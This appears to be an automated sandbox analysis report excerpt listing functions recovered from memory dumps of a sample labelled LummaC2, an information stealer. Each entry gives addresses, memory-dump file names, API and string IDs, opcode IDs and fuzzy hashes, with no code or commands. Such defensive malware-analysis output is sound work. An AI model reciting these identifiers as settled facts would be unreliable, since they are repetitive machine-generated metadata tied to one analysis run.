                                              Function 00E2E9E0 Relevance: .1, Instructions: 130COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 9cbd6b141bab38eba2ea0845161330c0466be2fbbea08cdf6dec7f1506e69ba0
                                              • Instruction ID: d9b938f130eed2a66169cb6237ef90387439e73c3c90fc21394a06c2bd5d0b1d
                                              • Opcode Fuzzy Hash: 9cbd6b141bab38eba2ea0845161330c0466be2fbbea08cdf6dec7f1506e69ba0
                                              • Instruction Fuzzy Hash: 8831EAB1A043246BE724AA24FC45B7BBBA4EF91758F10682CF88677391E231ED048752
                                              Function 00E2D860 Relevance: .1, Instructions: 125COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7b3ff9051ffa9489301555f113d502ca40109dc36581cf5426162d7e61372c07
                                              • Instruction ID: bdd2b3457ea64dd4118acc0134ad4869b39aa4d7ba2ab0ab58a08a1f5caf0d47
                                              • Opcode Fuzzy Hash: 7b3ff9051ffa9489301555f113d502ca40109dc36581cf5426162d7e61372c07
                                              • Instruction Fuzzy Hash: CD314D70208211AFE7189B29AC4563777A1EFC5329F28962CF7D6B32E4E370AC54D651
                                              Function 00E2EB40 Relevance: .1, Instructions: 108COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 356eae5dc4eff8cb98ad6f9ebf9398660c483875863124a4a2e873a7c4882305
                                              • Instruction ID: efdb464ea1887d352d5559c6434417e9c1045efb4f5689a795652204a96bf0d2
                                              • Opcode Fuzzy Hash: 356eae5dc4eff8cb98ad6f9ebf9398660c483875863124a4a2e873a7c4882305
                                              • Instruction Fuzzy Hash: 52313D3260C3784FC71D9D7C985026FBA92ABC6324F1E863EE9A2573C5D930984153C1
                                              Function 00E1057D Relevance: .1, Instructions: 107COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 585e85f2439c89bb6021da13fc680eca8bb260db2b8241e70ea46babf259e995
                                              • Instruction ID: 32bf004523a3ca3db989b965f566b3effad3d68d8bfdf76bb5f129cb55df0687
                                              • Opcode Fuzzy Hash: 585e85f2439c89bb6021da13fc680eca8bb260db2b8241e70ea46babf259e995
                                              • Instruction Fuzzy Hash: 7F417022608BC28AD315CA3C8844346FF926BA6224F0DC7D8D1F98F3D3D665C5C5C791
                                              Function 00E2F57A Relevance: .1, Instructions: 103COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f388ec8ca4c9499514c587f92796e8421fe210a83ba486a5d0c5abfa38a1b26e
                                              • Instruction ID: ed59cbdcdd6d793917abcb5fead9be3969be2e354ed4d948d323f84a58e88c89
                                              • Opcode Fuzzy Hash: f388ec8ca4c9499514c587f92796e8421fe210a83ba486a5d0c5abfa38a1b26e
                                              • Instruction Fuzzy Hash: 3731F53A51C3509AE3088F20E42976BF7E2EF91314F14D92DD489972D1E7B5C84AC786
                                              Function 00DF2AE0 Relevance: .1, Instructions: 100COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b64de51b8762b2908ef739aabb11e28aab3d8fae4bd40eb7f7e22749f29d9e68
                                              • Instruction ID: b086bf3b62f60450753bfbadfb1096a97253978e23b832fd2ceb399f6f64d91a
                                              • Opcode Fuzzy Hash: b64de51b8762b2908ef739aabb11e28aab3d8fae4bd40eb7f7e22749f29d9e68
                                              • Instruction Fuzzy Hash: 6C21F4267180651BCB14CE3AACE4537BB9397CB30572EC5B6DF809775AC136D80AC270
                                              Function 00E08025 Relevance: .1, Instructions: 93COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5e14a62ede7354e1b44a4d9492753167c8f733147e7f2d290ad425f36d3f1941
                                              • Instruction ID: 4f72c599c75c16d447fba2a0582b2c8e2013e4237d22882cde3e5438a3515339
                                              • Opcode Fuzzy Hash: 5e14a62ede7354e1b44a4d9492753167c8f733147e7f2d290ad425f36d3f1941
                                              • Instruction Fuzzy Hash: 0E41E470504B428FD365CF39C995B92BBF0FF09314F088A6EC59A8B652EB35A589CB50
                                              Function 00E2A470 Relevance: .1, Instructions: 64COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                              • Instruction ID: 2b529c8ba5ae92b6754f6e29630b93c676c42cea02e138dcbf28faf949c18c13
                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                              • Instruction Fuzzy Hash: 6311EC33A051E40FC3169D3C9404565BFA31BD3239B5D93A9F4B9EB2D3D522CD8A8355
                                              Function 00E1D050 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 351fd1f04a5e6687177e801f537b76c3a34c7fce897a8268e58006895cdbd061
                                              • Instruction ID: 905c9bcec67de2e04e2d6836683c065f71973adc96710aa2f2dfcdb862ed9463
                                              • Opcode Fuzzy Hash: 351fd1f04a5e6687177e801f537b76c3a34c7fce897a8268e58006895cdbd061
                                              • Instruction Fuzzy Hash: 8A01B1F560830147D720DF1498D0BBBB3AAAF88708F19542CEA0967302DB72EC46C2B1
                                              Function 00E311E0 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 203c9688f3c3ad8c17998d17ea4e9013308352763e8b764483544ef5f405a89f
                                              • Instruction ID: 7aa73fa2218643ee573719cdbca8f7b8966d36e0264876c3a83dc74f890389e6
                                              • Opcode Fuzzy Hash: 203c9688f3c3ad8c17998d17ea4e9013308352763e8b764483544ef5f405a89f
                                              • Instruction Fuzzy Hash: 05F0D632504208BFD1105A4AAC48D377B6EFB8976CF10125CE555722A1A622AD11E6A1
                                              Function 00E0FD50 Relevance: .0, Instructions: 21COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                              • Instruction ID: f06ef456d96df4eef1c48862ff2a70f14c6d59fbd38d7bf9dad9a3d61f84454a
                                              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                              • Instruction Fuzzy Hash: FBD097209087A10E87288D3800A0537FBE8EA43612F0820AEE0C1F3045D220DC014298
                                              Function 00E09EA4 Relevance: .0, Instructions: 17COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 09a56cab3ed19fe57732fcaa24df1085cd236e962e375bddf0379597d17f1e73
                                              • Instruction ID: adeaec888c5986c420d6db59dca784fa262636356343ba6c02f4da25fa419a5f
                                              • Opcode Fuzzy Hash: 09a56cab3ed19fe57732fcaa24df1085cd236e962e375bddf0379597d17f1e73
                                              • Instruction Fuzzy Hash: A9D09E75C40105FFCD116B21ED4A854FD32BB51205F042570E415715B1E766A634DA96
                                              Function 00E26DF7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit
                                              • String ID: jA?2
                                              • API String ID: 2610073882-2492355632
                                              • Opcode ID: 13b840b4ffd2246753de2f179fc769cabe8fc1b393c6e32e7f5e3cfacd2ba11b
                                              • Instruction ID: e8d7194033ff283fcb7d18c57c59b7de5da2753d6d4c84524cc2368a481330ab
                                              • Opcode Fuzzy Hash: 13b840b4ffd2246753de2f179fc769cabe8fc1b393c6e32e7f5e3cfacd2ba11b
                                              • Instruction Fuzzy Hash: 0D512871108FC1CED326CA3888887D7BFE16B96314F084AACD1FA8B3D2C675A109C752